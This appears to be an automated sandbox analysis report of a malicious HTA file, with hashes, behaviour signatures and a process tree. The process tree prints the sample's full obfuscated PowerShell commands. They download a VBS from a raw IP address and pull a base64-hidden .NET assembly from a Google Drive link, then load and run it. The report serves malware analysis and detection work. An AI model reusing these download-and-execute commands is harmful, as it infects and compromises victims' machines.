Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-10-2024 12:48
Static task
static1
Behavioral task
behavioral1
Sample
seemeherewithgreatthingsentiretimewithgreatthingsonhere.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
seemeherewithgreatthingsentiretimewithgreatthingsonhere.hta
Resource
win10v2004-20241007-en
General
-
Target
seemeherewithgreatthingsentiretimewithgreatthingsonhere.hta
-
Size
130KB
-
MD5
b85260924fba0846c8b7c5a097a95609
-
SHA1
911e67583068cf720cc7b6548c2ac11a7bbfb1a2
-
SHA256
30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f
-
SHA512
a60163b64564fd14c39213e895c89f1126f4ac1a4fc4c1fa442012e16eedb8778047e95b91a8090e74d6683269757626472d2a1a652faf2d4923887f5504ef04
-
SSDEEP
96:Eam7XEWHA0WWHA5xdFxVfLPOYdb2YyCWHAMPWHA3Uz5+2TWHAbc7T:Ea2Xk0GHDxVfzyKCLwbiT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 316 pOwerSHELl.EXe 6 2832 powershell.exe 8 2832 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2164 powershell.exe 2832 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 316 pOwerSHELl.EXe 2364 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwerSHELl.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 316 pOwerSHELl.EXe 2364 powershell.exe 316 pOwerSHELl.EXe 316 pOwerSHELl.EXe 2164 powershell.exe 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 316 pOwerSHELl.EXe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 3052 wrote to memory of 316 3052 mshta.exe 30 PID 3052 wrote to memory of 316 3052 mshta.exe 30 PID 3052 wrote to memory of 316 3052 mshta.exe 30 PID 3052 wrote to memory of 316 3052 mshta.exe 30 PID 316 wrote to memory of 2364 316 pOwerSHELl.EXe 32 PID 316 wrote to memory of 2364 316 pOwerSHELl.EXe 32 PID 316 wrote to memory of 2364 316 pOwerSHELl.EXe 32 PID 316 wrote to memory of 2364 316 pOwerSHELl.EXe 32 PID 316 wrote to memory of 2892 316 pOwerSHELl.EXe 33 PID 316 wrote to memory of 2892 316 pOwerSHELl.EXe 33 PID 316 wrote to memory of 2892 316 pOwerSHELl.EXe 33 PID 316 wrote to memory of 2892 316 pOwerSHELl.EXe 33 PID 2892 wrote to memory of 2784 2892 csc.exe 34 PID 2892 wrote to memory of 2784 2892 csc.exe 34 PID 2892 wrote to memory of 2784 2892 csc.exe 34 PID 2892 wrote to memory of 2784 2892 csc.exe 34 PID 316 wrote to memory of 2800 316 pOwerSHELl.EXe 36 PID 316 wrote to memory of 2800 316 pOwerSHELl.EXe 36 PID 316 wrote to memory of 2800 316 pOwerSHELl.EXe 36 PID 316 wrote to memory of 2800 316 pOwerSHELl.EXe 36 PID 2800 wrote to memory of 2164 2800 WScript.exe 37 PID 2800 wrote to memory of 2164 2800 WScript.exe 37 PID 2800 wrote to memory of 2164 2800 WScript.exe 37 PID 2800 wrote to memory of 2164 2800 WScript.exe 37 PID 2164 wrote to memory of 2832 2164 powershell.exe 39 PID 2164 wrote to memory of 2832 2164 powershell.exe 39 PID 2164 wrote to memory of 2832 2164 powershell.exe 39 PID 2164 wrote to memory of 2832 2164 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemeherewithgreatthingsentiretimewithgreatthingsonhere.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\WindOwspowERshell\V1.0\pOwerSHELl.EXe"C:\Windows\syStEM32\WindOwspowERshell\V1.0\pOwerSHELl.EXe" "poWErSheLl -EX bypaSS -NOP -w 1 -c DEVIcEcReDenTiaLdEploymeNT ; iEx($(Iex('[sySteM.teXT.EnCoDiNG]'+[cHAR]58+[chAR]58+'UTF8.gEtStRing([System.CONVErT]'+[char]58+[cHaR]58+'FRombaSE64sTrIng('+[cHAR]34+'JHRmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFZmlOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJOVVosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBZWFhwTEhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbmosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRldEZiZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZUoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUNQRERXa1Zpd2EgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkdGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzM4MC9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0aGFwcGluZXNzd2l0aG1lLnRJRiIsIiRlblY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0aGFwcGluZXNzd2l0LnZiUyIsMCwwKTtzdEFSdC1TTGVFcCgzKTtTVEFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRoYXBwaW5lc3N3aXQudmJTIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypaSS -NOP -w 1 -c DEVIcEcReDenTiaLdEploymeNT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b6xu3oo8.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9982.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9981.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreathappinesswit.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aUVYKCAoKCdSdUNpbWFnZVVybCA9IHFhZGh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHFhJysnZDtSdUN3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1J1Q2ltYScrJ2dlQnl0ZXMgPSBSdUN3ZWJDbGllbnQuRG93bmxvYWREYXRhKFJ1Q2ltYWdlVXJsKTtSdUNpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZyhSdUNpbWFnZUJ5dGVzKTtSdUNzdGFydEZsYWcgPSBxYWQ8PEJBU0U2NF9TVEEnKydSVD4+cWFkO1J1Q2VuZEZsYWcgPSBxYWQ8PEJBU0U2NF9FTkQ+PicrJ3FhZDtSdUNzdGFydEluZGV4ID0gUnVDaW1hZ2VUZXh0LkluZGV4T2YoUnVDc3RhcicrJ3RGbGFnKTtSdUNlbmRJbmRlJysneCA9IFJ1Q2ltYWdlVGV4dC5JbmRleE9mKFJ1Q2VuZEZsYWcpO1J1Q3N0YXJ0SW5kZXggLWdlIDAgJysnLWFuZCBSdUNlbmRJbmRleCAtZ3QgUnVDc3RhcnRJbmRleDtSdUNzdGFydEluZGV4ICs9IFJ1Q3N0YXJ0RmxhZy5MZW5ndGg7UnVDYmFzZTY0TGVuZ3RoID0gUnVDZW5kSW5kZXggLSBSdUNzdGFydEluZGV4O1J1Q2Jhc2U2NENvbW1hbmQgPSBSdUNpbWFnZVRleHQuU3Vic3RyaW5nKFJ1Q3N0YXJ0SW5kZXgsIFJ1Q2Jhc2U2NExlbmd0aCk7UnVDYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoUnVDYmFzZTY0Q29tJysnbWFuZC5Ub0NoYXJBcnJheSgpIExtbCBGb3JFYWNoLU9iamVjdCB7IFJ1Q18gfSlbLTEuLi0oUnVDYmFzZTY0QycrJ29tbWFuZC5MZW5ndGgpXTtSJysndUNjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOicrJzpGcm9tQmFzZTY0U3RyaScrJ25nKFJ1JysnQ2Jhc2U2NFJldmVyc2VkKTtSdUNsbycrJ2EnKydkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoUnVDY29tbWFuZEJ5dGVzKTtSdUN2YScrJ2lNZXRob2QgPSBbZG5saWIuSU8uSG9tJysnZV0nKycuR2V0TWV0aG9kKHFhZFZBSXFhZCk7UnVDdmFpTWV0aG9kLkludm9rZShSdUNudWxsLCBAKHFhZHR4dC5DVkZEUlJXLzA4My8yOC42MDIuNTEyLjU4Ly86cHR0aHFhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkQ2FzUG9scWFkLCBxYWRkZXNhdGl2YWRvcWFkLCBxYWRkZXNhdGl2JysnYWRvcWFkLHFhZGRlc2F0aXZhZG9xYScrJ2QscWFkZGVzYXRpdmFkb3FhZCxxYWRkZXNhdGl2YWRvcWFkLHFhZGRlc2F0aXZhZG9xYWQscWFkZGVzYXQnKydpdmFkb3FhZCxxYWQxcWFkLHFhZGRlc2F0aXZhZG9xYWQpKTsnKSAgLVJlUGxhQ2UgJ0xtbCcsW2NoYXJdMTI0ICAtQ1JFUExhY0UoW2NoYXJdMTEzK1tjaGFyXTk3K1tjaGFyXTEwMCksW2NoYXJdMzktQ1JFUExhY0UoW2NoYXJdODIrW2NoYXJdMTE3K1tjaGFyXTY3KSxbY2hhcl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iEX( (('RuCimageUrl = qadhttps:/'+'/drive.google.c'+'om/uc?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur qa'+'d;RuCwebClient = New-Object System.Net.WebClient;RuCima'+'geBytes = RuCwebClient.DownloadData(RuCimageUrl);RuCimageText = [System.Text.Encoding'+']::UTF8.GetString(RuCimageBytes);RuCstartFlag = qad<<BASE64_STA'+'RT>>qad;RuCendFlag = qad<<BASE64_END>>'+'qad;RuCstartIndex = RuCimageText.IndexOf(RuCstar'+'tFlag);RuCendInde'+'x = RuCimageText.IndexOf(RuCendFlag);RuCstartIndex -ge 0 '+'-and RuCendIndex -gt RuCstartIndex;RuCstartIndex += RuCstartFlag.Length;RuCbase64Length = RuCendIndex - RuCstartIndex;RuCbase64Command = RuCimageText.Substring(RuCstartIndex, RuCbase64Length);RuCbase64Reversed = -join (RuCbase64Com'+'mand.ToCharArray() Lml ForEach-Object { RuC_ })[-1..-(RuCbase64C'+'ommand.Length)];R'+'uCcommandBytes = [System.Convert]:'+':FromBase64Stri'+'ng(Ru'+'Cbase64Reversed);RuClo'+'a'+'dedAssembly = [System.Reflection.Assembly]::Load(RuCcommandBytes);RuCva'+'iMethod = [dnlib.IO.Hom'+'e]'+'.GetMethod(qadVAIqad);RuCvaiMethod.Invoke(RuCnull, @(qadtxt.CVFDRRW/083/28.602.512.58//:ptthqad, qaddesativadoqad, qaddesativadoqad, qaddesativadoqad, qadCasPolqad, qaddesativadoqad, qaddesativ'+'adoqad,qaddesativadoqa'+'d,qaddesativadoqad,qaddesativadoqad,qaddesativadoqad,qaddesat'+'ivadoqad,qad1qad,qaddesativadoqad));') -RePlaCe 'Lml',[char]124 -CREPLacE([char]113+[char]97+[char]100),[char]39-CREPLacE([char]82+[char]117+[char]67),[char]36))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ff13407cd246154b009a30b6138ce6df
SHA1c9959d4d5704bd7765f3f0580655104c97711743
SHA256c2cb9b1b796a4251637397c9ff45ac96409505a5e4778f57b02edba257d34b48
SHA512b30f195ce8bfcaf34e4012a83361cd29e230118851a9d2b600030acf400213c984ffae9985e942040eff11b33371cab37cd633e2d343bd75973671e4b5bb9c57
-
Filesize
3KB
MD5370c263eff3d4c1fa384b44f639d9f8a
SHA1b0f5115e224020fc2366317d5c00e17061eba23d
SHA2562dd64b9a6e8d5d3b12b3417fc622588debcc7efeb9aa3bf8b57360c72b24fc7c
SHA5121c82b3dfc5927a2d519dc4021e31b852b69714132075d766db64ab0665b89e894f9255ab082ba531e879537d39f6418a7f8cbdebdff8911b49ff3deee9a8e9c0
-
Filesize
7KB
MD5ace652565715c121f9a74315afc766d1
SHA1ee2d2fa96c905412a5f8f22b3f969e27770053e1
SHA2569fabc9771428b87837e46880632a21741439b5a9662eceffa82cde47e7719d71
SHA5129f36a6dee931bcfb98acf7392d3c4da18f830cd8b7c51ab2dee9d7956159e5d86fd323e3885b0a20a022e6f8bc8ab1632c5c0050e9104c484df104c4f6b62e70
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57b1a81ac6dadf096ba5bcd3eeaad7a62
SHA100fa639b7fef388f7a41780f30df683c098f0c4b
SHA256aa315f4690afd85a82464a98853dabcaa5bd1d7f91c005cec593946ceb65c313
SHA512cd98b5f74192e7a096c705379c6c3f1695dc198e34a1982372960ac79649a06640f464549d684d4d30026ed65ddf8d57a49004a7ebacea44035d7746836cd08b
-
Filesize
137KB
MD5943769c1661d4e66fb570fc18be9a171
SHA10204c63f393b0a5fb3467816a08f6006c54b19c1
SHA256cb21f3d02a6dd6dd9e79081ff50a9c36cb6f9266b3f2e47417a919694e0b1545
SHA5124fe2047f5808fdaf8df6d196b0dea50a2d0431e8ce6421ae399d06046e7d394df68056b1ffff0d5c940d8f00320b154ef3ffddd3be91c3671b031ff71bc86c2f
-
Filesize
652B
MD5ef95e3898a1d921056a85e4010bc38e0
SHA1ffef3db88cc7d0e05087a0ed1a098aa0e6bde6e5
SHA256d4655cfc116017774d17aa612ccdffbec7ee19e5d59e94c4bf8fbc40cedd1bde
SHA51258883afcb74cd6dd164eb2d93410736848f4de4e0245dc3ad8f6a104cd8336b9941fe843a2d70d92d80d4e740c2218656cd517a1eb107d4fb9f2ffd7a0619528
-
Filesize
462B
MD5b31b2127406ec8062b42f6cfaeeba531
SHA11d117bf0fb1fc24f57f341d6acd95154a47298b2
SHA2568545b19637a099a1147203c681c7b8b049da6021259c3fba765d1412f0fc3dba
SHA5121238e4d22fb2411c8bfe27164e93ca5038a704365dbdea70983867ff8a54c46597e9e7e2262f3d7b349132d0cf1991790e30d4948903454eb803a6820435bfed
-
Filesize
309B
MD56796afc59512c5ad4ed2e553111d062d
SHA17c029aab6d3f319a638c3c43870908721cd4aaa5
SHA256368f8c749b4f3ac1e8354407fdd05edf3da98850776aeb07879b7e09c8734514
SHA512b0f44724039c0cd876104f17a0b5f41043d378c54c36523e09614d5529baea9a51962ef701a79505acc0e0155931d262a5145fec7ea5cec0587582940a8c96a5